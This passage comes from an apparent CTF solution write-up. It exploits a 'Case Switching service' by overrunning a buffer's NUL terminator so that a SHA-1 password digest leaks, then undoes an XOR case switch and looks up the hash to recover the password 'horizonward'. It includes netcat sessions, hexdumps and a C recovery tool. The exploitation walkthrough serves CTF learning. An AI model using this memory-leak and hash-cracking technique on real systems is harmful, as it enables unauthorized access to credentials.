Why would only 3 bytes match? Remember the XOR loop: it runs over the 255 bytes we asked for, and the digest starts at buffer offset 238 (0x212 - 0x124), so its first 255 - 238 = 17 bytes were XORed with 0x20 and only the last 3 were left alone. 0x6f XOR 0x20 = 0x4f, which is exactly the byte preceding those 3. Extrapolating, the whole digest is there, with the first 17 bytes XORed and trivially recoverable. One caveat is visible in the dump: the very first digest byte reads 0x2a rather than 0xe3 (0xc3 XOR 0x20), because the newline after our 238 "a"s was read as the 239th byte and landed on it (0x0a XOR 0x20 = 0x2a). That costs one byte of the digest unless the padding is sent without a trailing newline.

Now the same against the remote system:

# nc 127.0.0.1 4242 > out
1
255
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
# hexdump -Cv out 
00000000  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000010  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000020  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 0a 57  |==============.W|
00000030  65 6c 63 6f 6d 65 20 74  6f 20 74 68 65 20 43 61  |elcome to the Ca|
00000040  73 65 20 53 77 69 74 63  68 69 6e 67 20 73 65 72  |se Switching ser|
00000050  76 69 63 65 0a 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |vice.===========|
00000060  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000070  3d 3d 3d 3d 3d 3d 3d 3d  3d 3d 3d 3d 3d 3d 3d 3d  |================|
00000080  3d 3d 3d 0a 4d 61 6b 65  20 79 6f 75 72 20 63 68  |===.Make your ch|
00000090  6f 69 63 65 20 28 31 20  6f 72 20 32 29 3a 0a 31  |oice (1 or 2):.1|
000000a0  2e 20 55 73 65 20 73 65  72 76 69 63 65 0a 32 2e  |. Use service.2.|
000000b0  20 43 6f 6e 66 69 67 75  72 65 20 73 65 72 76 69  | Configure servi|
000000c0  63 65 20 28 6f 6e 6c 79  20 66 6f 72 20 61 64 6d  |ce (only for adm|
000000d0  69 6e 69 73 74 72 61 74  6f 72 73 29 0a 0a 59 6f  |inistrators)..Yo|
000000e0  75 20 73 65 6c 65 63 74  65 64 20 5b 31 5d 0a 49  |u selected [1].I|
000000f0  6e 70 75 74 3a 20 69 6e  70 75 74 20 73 69 7a 65  |nput: input size|
00000100  20 61 6e 64 20 74 68 65  6e 20 3c 73 69 7a 65 3e  | and then <size>|
00000110  20 62 79 74 65 73 0a 48  65 72 65 20 79 6f 75 20  | bytes.Here you |
00000120  67 6f 3a 0a 41 41 41 41  41 41 41 41 41 41 41 41  |go:.AAAAAAAAAAAA|
00000130  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000140  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000150  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000160  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000170  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000180  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000190  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001a0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001b0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001c0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001d0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001e0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
000001f0  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000200  41 41 41 41 41 41 41 41  41 41 41 41 41 41 41 41  |AAAAAAAAAAAAAAAA|
00000210  41 41 b6 81 c9 e2 a4 97  34 db b7 e5 d8 88 a8 97  |AA......4.......|
00000220  03 91 b9 33 a9 7e 03 02  01 0a                    |...3.~....|
0000022a

The interesting part is "b6 81 c9 e2 a4 97 34 db b7 e5 d8 88 a8 97 03 91 b9 33 a9 7e". XORing the first 17 bytes with 0x20 as discussed yields the digest 96a1e9c284b714fb97c5f8a888b723b19933a97e. Searching for this hash on Google yields the password "horizonward", which works.
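The recovery steps used above (read how far puts got, pad one byte past that NUL, then undo the XOR on the part of the digest that lies within the requested size) as a small C tool. This is an added example, not part of the original write-up. The captures are reconstructed from the hexdumps on this page (only the part after the banner matters); the prompt string, the 255-byte request and the 512-byte scratch buffer are assumptions:

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define XOR_KEY   0x20
#define SHA1_LEN  20
#define REQ_SIZE  255            /* the size we asked the service for */

static const char PROMPT[] = "Here you go:\n";

/* Find the leak in a raw capture: everything after the last "Here you go:\n", minus the '\n'
 * that puts() appends.  Returns a pointer into `cap` and stores the length in *len, or NULL. */
const unsigned char *leak_in_capture(const unsigned char *cap, size_t cap_len, size_t *len)
{
    size_t plen = sizeof PROMPT - 1;
    if (cap_len < plen) return NULL;
    for (size_t i = cap_len - plen + 1; i-- > 0;) {   /* search backwards */
        if (memcmp(cap + i, PROMPT, plen) != 0) continue;
        const unsigned char *p = cap + i + plen;
        size_t n = cap_len - (i + plen);
        if (n > 0 && p[n - 1] == '\n') n--;
        *len = n;
        return p;
    }
    return NULL;
}

/* puts() stopped at the first NUL, so the leak is exactly the non-NUL run and the NUL sits at
 * buffer offset leak_len.  Padding leak_len + 1 bytes overwrites it and lets the next run through. */
size_t next_pad(size_t leak_len) { return leak_len + 1; }

/* Undo the case switch on the bytes after our padding.  Buffer offset pad + i holds tail[i];
 * the loop only ran over the first `size` offsets, so only those were XORed. */
void unxor_tail(const unsigned char *tail, size_t n, size_t pad, size_t size, unsigned char *out)
{
    for (size_t i = 0; i < n; i++)
        out[i] = (pad + i < size) ? (unsigned char)(tail[i] ^ XOR_KEY) : tail[i];
}

/* Capture -> raw 20-byte digest.  Returns 0 on success, -1 if the capture is too short. */
int recover_sha1(const unsigned char *cap, size_t cap_len, size_t pad, size_t size,
                 unsigned char digest[SHA1_LEN])
{
    size_t n;
    const unsigned char *leak = leak_in_capture(cap, cap_len, &n);
    if (leak == NULL || n < pad + SHA1_LEN) return -1;
    unxor_tail(leak + pad, SHA1_LEN, pad, size, digest);
    return 0;
}

static void to_hex(const unsigned char *d, size_t n, char *hex)
{
    for (size_t i = 0; i < n; i++) sprintf(hex + 2 * i, "%02x", d[i]);
    hex[2 * n] = '\0';
}

/* Constructed captures: the tails of the hexdumps on this page, after `pad` bytes of "A". */
static const unsigned char TAIL_LOCAL_210[] = {
    0x2a, 0x20, 0x20, 0x20, 0x50, 0xc9, 0xdf, 0x9f, 0x68, 0x20,
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
    0x03, 0x02, 0x01, '\n' };
static const unsigned char TAIL_LOCAL_238[] = {
    0x2a, 0x69, 0xbc, 0x07, 0x09, 0x53, 0x2a, 0x5f, 0xa0, 0x5e, 0xdb, 0xa6, 0x56, 0x89, 0x0d, 0xeb,
    0x4f, 0x8a, 0x3f, 0x8f, 0x03, 0x02, 0x01, '\n' };
static const unsigned char TAIL_REMOTE_238[] = {
    0xb6, 0x81, 0xc9, 0xe2, 0xa4, 0x97, 0x34, 0xdb, 0xb7, 0xe5, 0xd8, 0x88, 0xa8, 0x97, 0x03, 0x91,
    0xb9, 0x33, 0xa9, 0x7e, 0x03, 0x02, 0x01, '\n' };

/* Rebuild "Here you go:\n" + pad x 'A' + tail; returns its length. */
static size_t build_capture(unsigned char *buf, size_t pad, const unsigned char *tail, size_t tail_len)
{
    size_t plen = sizeof PROMPT - 1;
    memcpy(buf, PROMPT, plen);
    memset(buf + plen, 'A', pad);
    memcpy(buf + plen + pad, tail, tail_len);
    return plen + pad + tail_len;
}

/* How much padding the next attempt needs, given this attempt's capture (0 if no prompt found). */
size_t pad_needed(size_t pad, const unsigned char *tail, size_t tail_len)
{
    unsigned char cap[512];
    size_t leak_len;
    size_t n = build_capture(cap, pad, tail, tail_len);
    return leak_in_capture(cap, n, &leak_len) ? next_pad(leak_len) : 0;
}

/* Recovered digest as hex (static buffer), or NULL on failure. */
const char *recover_hex(size_t pad, const unsigned char *tail, size_t tail_len)
{
    static char hex[2 * SHA1_LEN + 1];
    unsigned char cap[512], digest[SHA1_LEN];
    size_t n = build_capture(cap, pad, tail, tail_len);
    if (recover_sha1(cap, n, pad, REQ_SIZE, digest) != 0) return NULL;
    to_hex(digest, SHA1_LEN, hex);
    return hex;
}

int main(void)
{
    printf("pad after 210: %zu\n", pad_needed(210, TAIL_LOCAL_210, sizeof TAIL_LOCAL_210));
    printf("pad after 238: %zu (over 255)\n", pad_needed(238, TAIL_LOCAL_238, sizeof TAIL_LOCAL_238));
    printf("local : %s (first byte hit by our newline)\n", recover_hex(238, TAIL_LOCAL_238, sizeof TAIL_LOCAL_238));
    printf("remote: %s\n", recover_hex(238, TAIL_REMOTE_238, sizeof TAIL_REMOTE_238));
    return 0;
}
```

On the local capture the tool reproduces the 238 and 262 figures from the padding experiments and returns sha1("example") with its first byte replaced by the XORed newline; on the remote capture it returns the 96a1e9c2... digest that was looked up.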

session/solution/mid-ctf_asks1_3.txt · Last modified: 2020/07/19 12:49 (external edit)